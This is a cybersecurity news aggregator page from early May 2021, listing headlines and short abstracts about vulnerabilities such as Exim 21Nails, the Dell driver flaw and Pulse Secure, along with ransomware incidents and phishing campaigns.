NIST Seeks Input on HIPAA Security Rule Guidance Update Full Text

Abstract The National Institute of Standards and Technology is seeking public comment as it plans to update its 2008 guidance for implementing the HIPAA Security Rule, which went into effect 20 years ago.

Gov Info Security

May 05, 2021 – Vulnerabilities

New Study Warns of Security Threats Linked to Recycled Phone Numbers Full Text

Abstract A new academic study has highlighted a number of privacy and security pitfalls associated with recycling mobile phone numbers that could be abused to stage a variety of exploits, including account takeovers, conduct phishing and spam attacks, and even prevent victims from signing up for online services. Nearly 66% of the recycled numbers that were sampled were found to be tied to previous owners' online accounts at popular websites, potentially enabling account hijacks by simply recovering the accounts tied to those numbers. "An attacker can cycle through the available numbers shown on online number change interfaces and check if any of them are associated with online accounts of previous owners," the researchers  said . If so, the attacker can then obtain these numbers and reset the password on the accounts, and receive and correctly enter the OTP sent via SMS upon login." The findings are part of an analysis of a sample of 259 phone numbers available to new su

The Hacker News

May 5, 2021 – General

Misconfigs and Unpatched Bugs Top Cloud Native Security Incidents Full Text

Abstract Snyk study claims automation is key to enhancing security

Infosecurity Magazine

May 5, 2021 – General

Cyber Defense Magazine – May 2021 has arrived. Enjoy it! Full Text

Abstract Cyber Defense Magazine March 2021 Edition has arrived. We hope you enjoy this month's edition…packed with over 90 pages of excellent content. Cyber Defense Magazine May 2021 OVER 90+ PAGESLOADED WITH EXCELLENT CONTENTLearn from the experts, cybersecurity...

Security Affairs

May 5, 2021 – General

Next gen tech: Most promising areas of emerging technology and innovation in cyber Full Text

Abstract As adversaries evolve their technique, so must the cyber industry. In this SC Awards Winners Circle roundtable discussion, SC Media speaks to cybersecurity leaders, and SC Award recipients, about the most compelling areas of technology for ensuring the protection of sensitive data and networks.

SCMagazine

May 5, 2021 – Vulnerabilities

Dell Fixes Twelve-Year-Old Driver Vulnerability Impacting Millions of PCs Full Text

Abstract Hundreds of millions of Dell desktops, laptops, notebooks, and tablets will need to update their Dell DBUtil driver to fix a 12-year-old vulnerability that exposes systems to attacks.

The Record

May 05, 2021 – Vulnerabilities

BIOS PrivEsc Bugs Affect Hundreds of Millions of Dell PCs Worldwide Full Text

Abstract PC maker Dell has issued an update to fix multiple critical privilege escalation vulnerabilities that went undetected since 2009, potentially allowing attackers to gain kernel-mode privileges and cause a denial-of-service condition. The issues, reported to Dell by researchers from SentinelOne on Dec. 1, 2020, reside in a firmware update driver named "dbutil_2_3.sys" that comes pre-installed on its devices. Hundreds of millions of desktops, laptops, notebooks, and tablets manufactured by the company are said to be vulnerable. "Dell dbutil_2_3.sys driver contains an insufficient access control vulnerability which may lead to escalation of privileges, denial-of-service, or information disclosure. Local authenticated user access is required," Dell  said  in an advisory. All five separate flaws have been assigned the CVE identifier CVE-2021-21551 with a CVSS score of 8.8. A breakdown of the shortcomings is as follows -  CVE-2021-21551: Local Elevation Of Privilege

The Hacker News

May 5, 2021 – Phishing

Global Phishing Campaign Drops New Malware Trio Full Text

Abstract Mandiant warns financial crime group will be back

Infosecurity Magazine

May 5, 2021 – Vulnerabilities

Experts found critical authentication bypass flaw in HPE Edgeline Infrastructure Manager Full Text

Abstract Researchers found a critical vulnerability in HPE Edgeline Infrastructure Manager that could be exploited by a remote attacker to bypass authentication. Researchers from Tenable have disclosed a critical authentication bypass vulnerability in HPE Edgeline...

Security Affairs

May 5, 2021 – Vulnerabilities

Android May 2021 Update Out, Fixes Over 40 Vulnerabilities Full Text

Abstract The new security patch 2021-05-01 fixes three main critical flaws identified in the System component which could be exploited to run arbitrary code on a vulnerable Android device.

Softpedia

May 05, 2021 – Vulnerabilities

ALERT — New 21Nails Exim Bugs Expose Millions of Email Servers to Hacking Full Text

Abstract The maintainers of Exim have  released patches  to remediate as many as 21 security vulnerabilities in its software that could enable unauthenticated attackers to achieve complete remote code execution and gain root privileges. Collectively named  '21Nails ,' the flaws include 11 vulnerabilities that require local access to the server and 10 other weaknesses that could be exploited remotely. The issues were discovered by Qualys and reported to Exim on Oct. 20, 2020. "Some of the vulnerabilities can be chained together to obtain a full remote unauthenticated code execution and gain root privileges on the Exim Server," Bharat Jogi, senior manager at Qualys, said in public disclosure. "Most of the vulnerabilities discovered by the Qualys Research Team for e.g. CVE-2020-28017 affects all versions of Exim going back all the way to 2004." Exim is a popular mail transfer agent (MTA) used on Unix-like operating systems, with over 60% of the publicly reachable m

The Hacker News

May 5, 2021 – General

Shoppers Choose Guest Checkouts Over Security Fears Full Text

Abstract New study reveals major consumer mistrust of e-commerce brands

Infosecurity Magazine

May 5, 2021 – Botnet

New Cryptominer Spotted, Attacks Using Windows and Linux Bots Full Text

Abstract The Sysrv-hello crytpojacking botnet actively scans for vulnerable Windows and Linux enterprise servers and infects them with Monero miner, as well as self-propagating malware payloads.

Cyware Alerts - Hacker News

May 5, 2021 – Malware

BazarLoader Downloader is Using Social Engineering Techniques Full Text

Abstract It has been discovered in two separate cyberattack campaigns. Both the campaigns employed unique social engineering techniques and popular products used in many organizations.

Cyware Alerts - Hacker News

May 4, 2021 – Phishing

Bait Boost: Phishers Delivering Increasingly Convincing Lures Full Text

Abstract An intense hunt for corporate account credentials will continue into next quarter, researchers predict.

Threatpost

May 4, 2021 – Vulnerabilities

21 vulnerabilities in Exim mail server leave web, cloud operations exposed Full Text

Abstract Researchers found 21 unique vulnerabilities in the Exim mail server, some of which can be chained together to obtain full remote unauthenticated code execution and gain root privileges.

SCMagazine

May 04, 2021 – Phishing

U.S. Agency for Global Media data breach caused by a phishing attack Full Text

Abstract The U.S. Agency for Global Media (USAGM) has disclosed a data breach that exposed the personal information of current and former employees and their beneficiaries.

BleepingComputer

May 4, 2021 – Education

Choose Your Own Adventure game animates security awareness training Full Text

Abstract Interactive modules educate employees on phishing, social engineering, securely working from home, and more. And it all comes with a dose of nostalgia.

SCMagazine

May 04, 2021 – General

Hillicon Valley: Five things to watch in Facebook Oversight Board ruling on Trump | Trump launches new communications tool after social media ban | Spotify urged to scrap speech recognition tech Full Text

Abstract Happy Tuesday! All eyes and ears and mice in the tech world will be watching Facebook’s Oversight Board tomorrow. The panel will be issuing its decision on whether former President TrumpDonald TrumpWill Biden provide strategic clarity or further ambiguity on Taiwan? Taliban launches massive offensive after missed deadline for US troop withdrawal Republicans urge probe into Amazon government cloud-computing bid: report MORE should be allowed back on the platform after his suspension following the Jan. 6 Capitol insurrection. 

The Hill

May 4, 2021 – Phishing

Global Phishing Attacks Spawn Three New Malware Strains Full Text

Abstract The never-seen malware strains have "professionally coded sophistication" and were launched by a well-resourced APT using nearly 50 domains, one hijacked.

Threatpost

May 4, 2021 – General

Software developers warm up to automated testing as security, cloud rise in importance Full Text

Abstract Developers are frustrated about the sluggish pace of testing code and are increasingly incorporating automation and machine learning to ease workloads.

SCMagazine

May 04, 2021 – Government

DOD expands bug disclosure program to all publicly accessible systems Full Text

Abstract US Department of Defense (DOD) officials today announced that the department's Vulnerability Disclosure Program (VDP) has been expanded to include all publicly accessible DOD websites and applications.

BleepingComputer

May 4, 2021 – Denial Of Service

A massive DDoS knocked offline Belgian government websites Full Text

Abstract A massive distributed denial of service (DDoS) attack shut down Belgiums' government websites, internal networks were also impacted. A massive distributed denial of service (DDoS) attack hit most of the Belgium government’s IT network, according...

Security Affairs

May 04, 2021 – Vulnerabilities

Google Chrome adopts Windows 10 exploit protection feature Full Text

Abstract Google Chrome now hinders attackers' efforts to exploit security bugs on systems with Intel 11th Gen or AMD Zen 3 CPUs, running Windows 10 2004 or later.

BleepingComputer

May 4, 2021 – Vulnerabilities

Apple Fixes Zero‑Day Security Bugs Under Active Attack Full Text

Abstract On Monday, Apple released a quartet of unscheduled updates for iOS, macOS, and watchOS, slapping security patches on flaws in its WebKit browser engine.

Threatpost

May 4, 2021 – Vulnerabilities

Pulse Secure VPNs Get a Fix for Critical Zero-Day Bugs Full Text

Abstract The security flaw tracked as CVE-2021-22893 is being used by at least two APTs likely linked to China, to attack U.S. defense targets among others.

Threatpost

May 4, 2021 – Phishing

Fake Vaccine Domain Seized Full Text

Abstract Maryland US Attorney’s Office seizes domain name used in fake COVID-19 vaccine scam

Infosecurity Magazine

May 4, 2021 – Vulnerabilities

Most of Exim email servers could be hacked by exploiting 21Nails flaws Full Text

Abstract The maintainers of the Exim email server software addressed a collection of 21 issues, dubbed 21Nails, that can allow attackers to fully compromise mail servers. The maintainers of the Exim email server software have released security updates to address...

Security Affairs

May 4, 2021 – Attack

Telstra service provider hit by cyber attack as hackers claim SIM card information stolen Full Text

Abstract The victim, Melbourne-based Schepisi Communications, is a partner of Telstra that supplies phone numbers and cloud storage services on behalf of the telecommunications giant.

News.com.au

May 04, 2021 – Attack

Twilio discloses impact from Codecov supply-chain attack Full Text

Abstract Cloud communications company Twilio has now disclosed that the recent Codecov supply-chain attack exposed a small number of Twilio's customer email addresses.

BleepingComputer

May 4, 2021 – Business

JupiterOne nabs $30M to help companies manage cybersecurity data Full Text

Abstract JupiterOne, a cybersecurity management automation startup, today closed a $30 million Series B round led by Sapphire Ventures, with participation from previous investors Bain Capital Ventures.

Venture Beat

May 4, 2021 – Attack

Virgin Active SA Suffers Cyber-Attack Full Text

Abstract Virgin Active South Africa takes systems offline following cyber-attack

Infosecurity Magazine

May 4, 2021 – Vulnerabilities

Hundreds of Millions of Dell Users at Risk from Kernel-Privilege Bugs Full Text

Abstract The privilege-escalation bug remained hidden for 12 years and has been present in all Dell PCs, tablets and notebooks shipped since 2009.

Threatpost

May 4, 2021 – Phishing

Spearphishing Attack Uses COVID-21 Lure to Target Ukrainian Government Full Text

Abstract FortiGuard Labs has discovered yet another COVID-themed lure designed to compel unsuspecting victims to click on what appears to be an innocuous link that leads to a malicious zip file attachment.

Fortinet

May 4, 2021 – General

Third Parties Caused Data Breaches at 51% of Organizations Full Text

Abstract New research highlights weaknesses in third-party remote access security

Infosecurity Magazine

May 04, 2021 – Vulnerabilities

Critical 21Nails Exim bugs expose millions of servers to attacks Full Text

Abstract Newly discovered critical vulnerabilities in the Exim message transfer agent (MTA) software allow unauthenticated remote attackers to execute arbitrary code and gain root privilege on mail servers with default or common configurations.

BleepingComputer

May 4, 2021 – Business

Aryaka Networks buys Secucloud to offer a more secure network edge Full Text

Abstract The company said today that it has closed on a deal to buy German secure access service edge or SASE firm Secucloud GmbH. That company is now a fully owned subsidiary of Aryaka.

Silicon Angle

May 4, 2021 – Breach

Hacker leaks 150 million user records from Iranian Raychat app Full Text

Abstract The alleged data breach which has been seen and analyzed by Hackread.com includes full names, IP addresses, email addresses, Bcrypt passwords, Telegram messenger IDs, etc.

Hackread

May 4, 2021 – General

UK Cyber Security Association Officially Opens for Membership Full Text

Abstract The UK Cyber Security Association has officially launched, after being in an expressions of interest phase

Infosecurity Magazine

May 4, 2021 – Vulnerabilities

Hundreds of millions Of Dell PCs affected by CVE-2021-21551 flaws Full Text

Abstract American multinational computer technology giant Dell addresses a 12-year-old driver flaw, tracked as CVE-2021-21551, impacting millions of computers. Hundreds of millions of Dell computers worldwide are affected by a 12-year-old vulnerability, tracked...

Security Affairs

May 04, 2021 – Phishing

Worldwide phishing attacks deliver three new malware strains Full Text

Abstract A global-scale phishing campaign targeted worldwide organizations across a large array of industries with never-before-seen malware strains delivered via specially-tailored lures.

BleepingComputer

May 4, 2021 – Government

NSA Issues Guidance on Securing IT-OT Connectivity Full Text

Abstract The U.S. NSA last week released a cybersecurity advisory focusing on the security of operational technology (OT) systems, particularly in terms of connectivity to IT systems.

Security Week

May 04, 2021 – Malware

New Pingback Malware Using ICMP Tunneling to Evade C&C Detection Full Text

Abstract Researchers on Tuesday disclosed a novel malware that uses a variety of tricks to stay under the radar and evade detection, while stealthily capable of executing arbitrary commands on infected systems. Called 'Pingback,' the Windows malware leverages Internet Control Message Protocol ( ICMP ) tunneling for covert bot communications, allowing the adversary to utilize ICMP packets to piggyback attack code, according to an analysis published today by Trustwave. Pingback (" oci.dll ") achieves this by getting loaded through a legitimate service called  MSDTC  (Microsoft Distributed Transaction Coordinator) — a component responsible for handling database operations that are distributed over multiple machines — by taking advantage of a method called  DLL search order hijacking , which involves using a genuine application to preload a malicious DLL file. Naming the malware as one of the plugins required for supporting  Oracle ODBC  interface in MSDTC is key to the atta

The Hacker News

May 4, 2021 – Ransomware

Scripps Health Knocked Offline by Ransomware Full Text

Abstract Healthcare non-profit postpones appointments after attack

Infosecurity Magazine

May 4, 2021 – Ransomware

Project Signal: a second Iranian State-Sponsored Ransomware Operation Full Text

Abstract Iran-linked ATP group carried out a ransomware operation through a contracting company based in the country, Flashpoint researchers warn. Researchers from Flashpoint have uncovered a state-sponsored ransomware campaign conducted by Iran’s Islamic...

Security Affairs

May 4, 2021 – Vulnerabilities

Dell patches vulnerable driver in a decade of IT products, computers and laptops Full Text

Abstract The five bugs, collectively cataloged as CVE-2021-21551, create privilege escalation and denial of service issues stemming from memory corruption, lack of authentication, and code logic flaws.

SCMagazine

May 04, 2021 – Vulnerabilities

Vulnerable Dell driver puts hundreds of millions of systems at risk Full Text

Abstract A driver that's been pushed for the past 12 years to Dell computer devices for consumers and enterprises contains multiple vulnerabilities that could lead to increased privileges on the system.

BleepingComputer

May 4, 2021 – Business

Acronis Raises $250 Million at $2.5 Billion Valuation Full Text

Abstract The funding, which brings the total raised by the company to more than $400 million, was led by CVC Capital Partners VII. Acronis announced achieving unicorn status in 2019 after raising $147 million.

Security Week

May 04, 2021 – General

How Should the Service Desk Reset Passwords? Full Text

Abstract Ask the average helpdesk technician what they do all day, and they will probably answer by saying that they reset passwords. Sure, helpdesk technicians do plenty of other things too, but in many organizations, a disproportionate number of helpdesk calls are tied to password resets. On the surface, having a  helpdesk technician reset a user's password  probably doesn't seem like a big deal. After all, the technician simply opens Active Directory Users and Computers, right-clicks on the user account, and chooses the Reset Password command from the shortcut menu. Resetting a password in this way is an easy process. Organizations can even opt to use an alternative tool such as the Windows Admin Center or even PowerShell if they prefer. One thing that most people probably don't stop and think about, however, is that even though the steps involved in the password reset process are simple enough, the  process as a whole constitutes a major security risk . Security and the service desk Th

The Hacker News

May 4, 2021 – Vulnerabilities

Pulse Secure Patches Critical Zero-Day Flaw Full Text

Abstract CVSS 10.0 bug was exploited by multiple APT groups

Infosecurity Magazine

May 4, 2021 – Vulnerabilities

Apple addresses three zero-day flaws in its WebKit browser engine Full Text

Abstract Apple has released security updates to patch three zero-days in the WebKit, the Apple's browser engine, and fixed a zero-day exploited in the wild. Apple released security updates to address four zero-day vulnerabilities impacting WebKit, which is used...

Security Affairs

May 4, 2021 – General

A unified front: Effective, cooperative vendor-user relationships Full Text

Abstract What factors into a productive vendor-customer relationship? What are the perpetual challenges that emerge? In this SC Awards Winners Circle roundtable, we spoke to cybersecurity leaders, and SC Award winners, to break down the components of a vendor-user relationship that drive effective system security.

SCMagazine

May 04, 2021 – Malware

New Windows ‘Pingback’ malware uses ICMP for covert communication Full Text

Abstract Today, Trustwave researchers have disclosed their findings on a novel Windows malware sample that uses Internet Control Message Protocol (ICMP) for its command-and-control (C2) activities. Dubbed "Pingback," this malware targets Windows 64-bit systems, and uses DLL Hijacking to gain persistence.

BleepingComputer

May 4, 2021 – Business

Imperva acquires API security company CloudVector Full Text

Abstract Imperva today announced it plans to acquire application programming interface (API) security company CloudVector for an undisclosed sum to differentiate itself in the API protection market.

Venture Beat

May 04, 2021 – Vulnerabilities

Critical Patch Out for Critical Pulse Secure VPN 0-Day Under Attack Full Text

Abstract Ivanti, the company behind Pulse Secure VPN appliances, has released a security patch to remediate a critical security vulnerability that was found being actively exploited in the wild by at least two different threat actors. Tracked as  CVE-2021-22893  (CVSS score 10), the flaw concerns "multiple use after free" issues in Pulse Connect Secure that could allow a remote unauthenticated attacker to execute arbitrary code and take control of the affected system. All Pulse Connect Secure versions prior to 9.1R11.4 are impacted. The flaw came to light on April 20 after FireEye  disclosed  a series of intrusions targeting defense, government, and financial organizations in the U.S. and elsewhere by leveraging critical vulnerabilities in the remote access solution to bypass multi-factor authentication protections and breach enterprise networks. The development promoted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an  Emergency Directive  urging fede

The Hacker News

May 4, 2021 – Ransomware

Suspected Iranian Ransomware Group Targets Israeli Firms Full Text

Abstract Report suggests “Networm” group has hit H&M Israel

Infosecurity Magazine

May 4, 2021 – Vulnerabilities

Apple Reports Two iOS Zero-day Vulnerabilities Actively Used in Attacks Full Text

Abstract A week after Apple issued the release of iOS 14.5, the company has released a new update to patch two zero-days that allowed attackers to execute malicious code on up-to-date devices.

Ars Technica

May 4, 2021 – Botnet

Massive Botnet Infected Internet TV Users, Now Taken Down Full Text

Abstract Dubbed Pareto CTV botnet, the botnet was made of almost a million infected Android devices and imitated the activity of millions of people watching ads on their smart devices.

Cyware Alerts - Hacker News

May 03, 2021 – Vulnerabilities

Apple Releases Urgent Security Patches For Zero‑Day Bugs Under Active Attacks Full Text

Abstract Apple on Monday released security updates for  iOS ,  macOS , and  watchOS  to address three zero-day flaws and expand patches for a fourth vulnerability that the company said might have been exploited in the wild. The weaknesses all concern WebKit, the browser engine which powers Safari and other third-party web browsers in iOS, allowing an adversary to execute arbitrary code on target devices. A summary of the three security bugs are as follows - CVE-2021-30663:  An integer overflow vulnerability that could be exploited to craft malicious web content, which may lead to code execution. The flaw was addressed with improved input validation. CVE-2021-30665:  A memory corruption issue that could be exploited to craft malicious web content, which may lead to code execution. The flaw was addressed with improved state management. CVE-2021-30666:  A buffer overflow vulnerability that could be exploited to craft malicious web content, which may lead to code execution. The flaw was addr

The Hacker News

May 03, 2021 – Ransomware

Health care giant Scripps Health hit by ransomware attack Full Text

Abstract Nonprofit health care provider Scripps Health in San Diego is currently dealing with a ransomware attack that forced the organization to suspend user access to its online portal and switch to alternative methods for patient care operations.

BleepingComputer

May 03, 2021 – General

Hillicon Valley: Facebook Oversight Board to rule on Trump ban Wednesday | Washington keeps close eye as Apple antitrust fight goes to court | Twitter expands Clubhouse-like feature Full Text

Abstract Happy Monday! Facebook’s Oversight Board said it will announce its decision on former President TrumpDonald TrumpFacebook Oversight Board to rule on Trump ban Wednesday Rubio keeping door open on White House bid Lincoln Project taunts Trump, saying he lost to 'swamp,' McConnell MORE’s suspended accounts on Wednesday. In California, the antitrust trial between Apple and Epic Games kicked off, and it's expected to be closely watched in Washington amid mounting scrutiny over the market power of Silicon Valley giants. And Twitter announced it’s opening up its live audio room feature, Spaces, to more users.

The Hill

May 3, 2021 – Vulnerabilities

Expert released PoC exploit for Microsoft Exchange flaw Full Text

Abstract Security researcher released technical details and a PoC code for a high-severity vulnerability in Microsoft Exchange Server reported by the NSA. A security expert released technical details and proof-of-concept exploit (PoC) code for the high-severity...

Security Affairs

May 3, 2021 – Vulnerabilities

Pulse Secure releases patch for zero-day used to target defense industrial base Full Text

Abstract Pulse Security said over the past couple of weeks it has worked closely with the Cybersecurity and Infrastructure Security Agency (CISA) as well as FireEye and Stroz Friedberg to investigate and respond quickly to the malicious activity that was identified on its customers’ systems.

SCMagazine

May 3, 2021 – Outage

Scripps Health Cyberattack Causes Widespread Hospital Outages Full Text

Abstract The San Diego-based hospital system diverted ambulances to other medical centers after a suspected ransomware attack.

Threatpost

May 03, 2021 – Vulnerabilities

Apple fixes 2 iOS zero-day vulnerabilities actively used in attacks Full Text

Abstract Today, Apple has released security updates that fix two actively exploited iOS zero-day vulnerabilities in the Webkit engine used by hackers to attack iPhones, iPads, iPods, macOS, and Apple Watch devices.

BleepingComputer

May 3, 2021 – Attack

New Attacks Slaughter All Spectre Defenses  Full Text

Abstract The 3+ years computer scientists spent concocting ways to defend against these supply-chain attacks against chip architecture? It’s bound for the dustbin.

Threatpost

May 03, 2021 – Ransomware

N3TW0RM ransomware emerges in wave of cyberattacks in Israel Full Text

Abstract A new ransomware gang known as 'N3TW0RM' is targeting Israeli companies in a wave of cyberattacks starting last week.

BleepingComputer

May 3, 2021 – General

Hack the Capitol returns Tuesday, as all eyes look toward critical infrastructure security Full Text

Abstract SC Media talked about the event’s significance with organizer and founder of both Scythe and GRIMM, Bryson Bort.

SCMagazine

May 3, 2021 – General

Hack the Capital returns Tuesday, as all eyes look toward critical infrastructure security Full Text

Abstract SC Media talked about the event’s significance with organizer and founder of both Scythe and GRIMM, Bryson Bort.

SCMagazine

May 3, 2021 – APT

Naikon APT Group is Now Using Nebulae Backdoor Full Text

Abstract Researchers uncovered mischievous activities by the Naikon hacking group, which has been deploying a new backdoor against military organizations in Southeast Asia for over two years.

Cyware Alerts - Hacker News

May 3, 2021 – Malware

WeSteal Stealer and WeControl RAT - The New Commodity Malware in Town Full Text

Abstract Malware curators often peddle their creations in underground forums in creative ways. Now, a new malware is being shamelessly marketed as the leading way to make money in 2021.

Cyware Alerts - Hacker News

May 3, 2021 – Vulnerabilities

UNC2447 Exploiting SonicWall Zero-day to Breach Networks Full Text

Abstract A financially motivated threat group, tracked as UNC2447, was spotted exploiting a previously disclosed zero-day flaw in SonicWall’s Secure Mobile Access (SMA) appliances.

Cyware Alerts - Hacker News

May 3, 2021 – Malware

RotaJakiro Stayed Hidden for Several Years Full Text

Abstract A new malware backdoor in the town is giving a tough time to researchers by using a double encryption algorithm, a combination of AES and XOR, to stay under the radar.

Cyware Alerts - Hacker News

May 3, 2021 – Ransomware

Ryuk Ransomware Operators have Updated their Attack Techniques Full Text

Abstract Security researchers from AdvIntel discovered that Ryuk ransomware attacks are now mostly using exposed RDP connections to gain an initial foothold inside a targeted network.

Cyware Alerts - Hacker News

May 3, 2021 – APT

Russia-Linked SVR APT Group Exploiting Five Known Vulnerabilities Full Text

Abstract A joint advisory by the FBI, CISA, and NSA disclosed that the Russian APT group is exploiting flaws in Fortinet, Zimbra, Citrix, Pulse Secure, and VMware solutions to obtain login credentials.

Cyware Alerts - Hacker News

May 3, 2021 – Vulnerabilities

Hewlett Packard Enterprise Plugs Critical Bug in Edge Platform Tool Full Text

Abstract Researchers warned that unpatched versions of HPE’s Edgeline Infrastructure Manager are open to remote authentication-bypass attacks.

Threatpost

May 3, 2021 – Breach

Codecov’s Code Coverage Tool Hacked Full Text

Abstract The attackers started to target Bash Uploader on January 31, when they modified the script to deliver the info from the customers’ environment to a server outside Codecov’s infrastructure.

Cyware Alerts - Hacker News

May 03, 2021 – Vulnerabilities

PoC exploit released for Microsoft Exchange bug dicovered by NSA Full Text

Abstract Technical documentation and proof-of-concept exploit (PoC) code has been released for a high-severity vulnerability in Microsoft Exchange Server that could let remote attackers execute code on unpatched machines.

BleepingComputer

May 3, 2021 – Phishing

Magecart scammers aim at restaurants’ online delivery systems Full Text

Abstract The last six months have seen security breaches of five online ordering platforms, exposing some 343,000 payment cards, threat intelligence firm Gemini Advisory said on April 29.

Cyberscoop

May 03, 2021 – Outage

Alaska court system forced offline by cyberattack Full Text

Abstract The Alaska Court System (ACS) was forced to temporarily disconnect its online servers this week due to a cyberattack that installed malware on their systems, disrupting virtual court hearings. 

The Hill

May 03, 2021 – Breach

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys Full Text

Abstract Most mobile app users tend to blindly trust that the apps they download from app stores are safe and secure. But that isn't always the case. To demonstrate the pitfalls and identify vulnerabilities on a large scale, cybersecurity and machine intelligence company CloudSEK recently provided a platform called  BeVigil  where individuals can search and check app security ratings and other security issues before installing an app. A latest  report  shared with The Hacker News detailed how the BeVigil search engine identified over 40 apps - with more than a cumulative 100 million downloads - that had hardcoded private Amazon Web Services (AWS) keys embedded within them, putting their internal networks and their users' data at risk of cyberattacks. BeVigil finds popular apps leaking AWS keys The AWS key leakage was spotted in some of the major apps such as Adobe Photoshop Fix, Adobe Comp, Hootsuite, IBM's Weather Channel, and online shopping services Club Factory and Wholee.

The Hacker News

May 3, 2021 – Breach

Contact Tracer Breach Hits the Keystone State Full Text

Abstract PHI of 72,000 Pennsylvanians exposed after Insight Global employees allegedly ignored security protocols

Infosecurity Magazine

May 3, 2021 – Government

How a Norwegian Government Report Shows the Limits of CFIUS Data Reviews Full Text

Abstract CFIUS forced a Chinese firm to sell Grindr in 2019. Yet the application is sharing data widely today, including to a company in China.

Lawfare

May 3, 2021 – Vulnerabilities

Pulse Secure fixes zero-day in Pulse Connect Secure (PCS) SSL VPN actively exploited Full Text

Abstract Pulse Secure has fixed a zero-day flaw in the Pulse Connect Secure (PCS) SSL VPN appliance that threat actors are actively exploiting in the wild. Pulse Secure has addressed a zero-day vulnerability (CVE-2021-22893) in the Pulse Connect Secure (PCS)...

Security Affairs

May 3, 2021 – Deepfake

Deepfake Attacks Are About to Surge, Experts Warn Full Text

Abstract New deepfake products and services are cropping up across the Dark Web.

Threatpost

May 03, 2021 – Vulnerabilities

Pulse Secure fixes VPN zero-day used to hack high-value targets Full Text

Abstract Pulse Secure has fixed a zero-day vulnerability in the Pulse Connect Secure (PCS) SSL VPN appliance that is being actively exploited to compromise the internal networks of defense firms and govt agencies.

BleepingComputer

May 3, 2021 – Phishing

DarkPath scam group loses 134 domains impersonating the WHO Full Text

Abstract United Nations security experts and security firm Group-IB said they worked together to take down 134 websites operated by a cybercrime group known as DarkPath and tricking users via a fake survey.

The Record

May 3, 2021 – Criminals

Online Child Abuse Platform with 400k Users Taken Down Full Text

Abstract Darknet CSAM site Boystown seized and alleged site operators arrested

Infosecurity Magazine

May 3, 2021 – Breach

Most Common Causes of Data Breach and How to Prevent It Full Text

Abstract Which are the most common causes of a Data Breach and how to prevent It? How can organizations prevent it? Data breaches are highly damaging and equally embarrassing for businesses andconsumers. If you look at Verizon’s 2020 Data Breach Investigations...

Security Affairs

May 3, 2021 – Vulnerabilities

Tesla Car Hacked Remotely From Drone via Zero-Click Exploit Full Text

Abstract The attack, dubbed TBONE, involves the exploitation of two vulnerabilities affecting ConnMan to take full control of the infotainment system of a Tesla without any user interaction.

Security Week

May 3, 2021 – Privacy

US Mulling Domestic Spying Partnership with Private Companies Full Text

Abstract US president reportedly considering using private firms to spy on Americans’ online activity

Infosecurity Magazine

May 3, 2021 – Outage

Virgin Active goes offline after sophisticated cyberattack Full Text

Abstract Virgin Active SA says it was forced to go offline after being targeted by cybercriminals. Forensic experts are probing the extent of the attack to determine if any information was compromised.

Timeslive

May 3, 2021 – Malware

Hackers Abuse Excel 4.0 Macros to Deliver ZLoader and Quakbot Malware Full Text

Abstract The Excel macros are quite old, but hackers are targetting them because it provides paths to access all the powerful functionalities like interaction with the operating system (OS).

GB Hackers

May 03, 2021 – General

Microsoft reveals final plan to remove Flash Player in Windows 10 Full Text

Abstract Microsoft quietly revealed its plans to remove the Adobe Flash plugin from Windows 10, with mandatory removal starting in July 2021.

BleepingComputer

May 3, 2021 – Breach

Toronto hit by ‘potential cyber breach’ from Accellion file transfer software Full Text

Abstract The City of Toronto says it suffered a “potential cyber breach” from its use of its Accellion FTA file transfer server in January that may have involved the health information of individuals.

IT World Canada

May 03, 2021 – Malware

A Rust-based Buer Malware Variant Has Been Spotted in the Wild Full Text

Abstract Cybersecurity researchers on Monday disclosed a new malspam campaign distributing a fresh variant of a malware loader called 'Buer' written in Rust, illustrating how adversaries are constantly honing their malware toolsets to evade analysis. Dubbed "RustyBuer," the malware is distributed via emails masquerading as shipping notices from DHL Support, and is said to have affected no fewer than 200 organizations across more than 50 verticals since early April. "The new Buer variant is written in Rust, an efficient and easy-to-use programming language that is becoming increasingly popular," Proofpoint researchers  said  in a report shared with The Hacker News. "Rewriting the malware in Rust enables the threat actor to better evade existing Buer detection capabilities." First introduced in August of 2019,  Buer  is a modular malware-as-a-service offering that's sold on underground forums and used as a first-stage downloader to deliver additional

The Hacker News

May 3, 2021 – Breach

Experian API exposed credit scores of tens of millions of Americans Full Text

Abstract Experian API exposed credit scores of tens of millions of Americans due to a weakness with a partner website. Anyone was able to look up the credit score of tens of millions of Americans just by providing their name and mailing address. The issue...

Security Affairs

May 3, 2021 – General

After no ordinary year, congratulations to the 2021 SC Award winners Full Text

Abstract This year’s awards feel quite different because – clearly – this was no ordinary year. The demands placed upon both cybersecurity professionals and vendors were profound, inching on extraordinary. But for all the challenges, these were inspiring times.

SCMagazine

May 03, 2021 – General

Microsoft reveals final plan to remove Flash Player in Windows 10 Full Text

Abstract Microsoft quietly revealed its plans to remove the Adobe Flash plugin from Windows 10, with mandatory removal starting in July 2021.

BleepingComputer

May 3, 2021 – Ransomware

Cloud Hosting Provider Swiss Cloud Suffered Ransomware Attack Impacting Server Infrastructure Full Text

Abstract “On Monday morning, May 3rd, swiss cloud computing ag will inform you again about the current status and outlook,” a statement said. The impacted servers are expected to be restored by next week.

Security Affairs

May 03, 2021 – Ransomware

Researchers Uncover Iranian State-Sponsored Ransomware Operation Full Text

Abstract Iran has been linked to yet another state-sponsored ransomware operation through a contracting company based in the country, according to new analysis. "Iran's Islamic Revolutionary Guard Corps ( IRGC ) was operating a state-sponsored ransomware campaign through an Iranian contracting company called 'Emen Net Pasargard' (ENP)," cybersecurity firm Flashpoint  said  in its findings summarizing three documents leaked by an anonymous entity named Read My Lips or Lab Dookhtegan between March 19 and April 1 via its Telegram channel. Dubbed "Project Signal," the initiative is said to have kickstarted sometime between late July 2020 and early September 2020, with ENP's internal research organization, named the "Studies Center," putting together a list of unspecified target websites. A second spreadsheet validated by Flashpoint explicitly spelled out the project's financial motivations, with plans to launch the ransomware operations in late

The Hacker News

May 3, 2021 – General

Threat Report Portugal: Q1 2021 Full Text

Abstract The Threat Report Portugal: Q1 2021 compiles data collected on the malicious campaigns that occurred from January to March, Q1, of 2021. Threat Report Portugal Q1 2021: Phishing and malware by numbers. The Portuguese Abuse Open Feed 0xSI_f33d is...

Security Affairs

May 3, 2021 – General

Not-so-customary customer service: Experts offer tips on vendor best practices Full Text

Abstract From initial overtures and negotiations to installation and implementation to day-to-day operations and troubleshooting, The best vendor-customer relationships require mutual respect and open communication.

SCMagazine

May 3, 2021 – Breach

